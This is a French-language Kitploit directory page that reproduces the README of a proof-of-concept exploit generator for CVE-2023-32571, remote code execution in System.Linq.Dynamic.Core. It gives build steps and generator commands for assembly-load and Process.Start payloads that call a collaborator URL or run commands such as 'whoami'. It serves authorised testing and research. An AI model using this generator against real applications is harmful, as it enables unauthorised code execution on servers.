Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-32571 — Preuve de concept pour CVE-2023-32571 | Kitploit
Outils/GitHubGitHub/sectex/cve-2023-32571
Génération de PayloadsAnalyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebApprentissage et Éducation
GitHubsectex/cve-2023-32571

CVE-2023-32571

Preuve de concept pour CVE-2023-32571

Voir le dépôt
2il y a 10 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🐞 CVE-2023-32571 - Exécution de Code à Distance dans System.Linq.Dynamic.Core

Preuve de concept pour CVE-2023-32571, une vulnérabilité d'exécution de code à distance dans System.Linq.Dynamic.Core (versions 1.0.7.10 à 1.2.25). Cette vulnérabilité permet aux attaquants d'exécuter du code et des commandes arbitraires lorsque des entrées non fiables sont analysées par des méthodes telles que Where, Select, OrderBy.

⚠️ Avertissement

Cet outil est fourni uniquement à des fins éducatives et de test autorisé. L'utilisation de cet outil pour attaquer des cibles sans consentement mutuel préalable est illégale. Les développeurs déclinent toute responsabilité et ne sont pas responsables de tout usage abusif ou de tout dommage causé par ce programme.

🎯 Prérequis

  • SDK .NET 9.0 ou version ultérieure
  • Application cible utilisant une version vulnérable de System.Linq.Dynamic.Core (1.0.7.10 à 1.2.25)
  • Un serveur collaborateur (ex. Burp Collaborator, Interactsh) pour observer les rappels

🛠️ Construction du projet

  1. Compiler le projet :
    root@kitploit:~
    dotnet build --configuration Release
    
    La compilation produira :
Télécharger l’outil
  • La DLL de la charge utile dans Payload/bin/Release/netstandard2.0/Payload.dll
  • Le générateur de charge utile dans Generator/bin/Release/net9.0/Generator.dll
  • 🚀 Utilisation

    Modes

    L'outil prend en charge deux modes :

    1. AssemblyLoad (Mode 0) : Charger et exécuter un assembly .NET personnalisé
    2. ProcessStart (Mode 1) : Exécuter directement des commandes système via Process.Start

    Mode 0 : AssemblyLoad (par défaut)

    root@kitploit:~
    # Utilisation du codage Base64
    ./Generator --mode 0 --file Payload.dll --type Payload --parameters "\"<votre-url-collaborateur>\"" --encoding 1
    
    # Utilisation du codage Hex
    ./Generator --mode 0 --file Payload.dll --type Payload --parameters "\"<votre-url-collaborateur>\"" --encoding 0
    
    root@kitploit:~
    # Utilisation du codage Base64
    Generator.exe --mode 0 --file Payload.dll --type Payload --parameters "`"<votre-url-collaborateur>`"" --encoding 1
    
    # Utilisation du codage Hex
    Generator.exe --mode 0 --file Payload.dll --type Payload --parameters "`"<votre-url-collaborateur>`"" --encoding 0
    

    Mode 1 : ProcessStart (Exécution directe de commande)

    root@kitploit:~
    # Exécution de commande Windows
    ./Generator --mode 1 --parameters "cmd.exe /c ping <votre-url-collaborateur>"
    
    # Exécution de commande Linux  
    ./Generator --mode 1 --parameters "bash -c ping <votre-url-collaborateur>"
    

    ⚙️ Paramètres

    • --mode : Mode d'exploitation (0=AssemblyLoad, 1=ProcessStart)
    • --file : Chemin vers l'assembly .NET à charger (obligatoire pour le mode AssemblyLoad)
    • --type : Nom de type qualifié complet à instancier (obligatoire pour le mode AssemblyLoad)
    • --parameters : Paramètres selon le mode :
      • AssemblyLoad : Paramètres du constructeur (séparés par des virgules)
      • ProcessStart : Commande à exécuter (ex. 'cmd.exe /c whoami' ou 'bash -c whoami')
    • --encoding : Méthode de codage pour le mode AssemblyLoad (0=Hex, 1=Base64)

    📚 Références

    • NIST NVD
    • NCCGROUP Advisory
    • Dépôt GitHub System.Linq.Dynamic.Core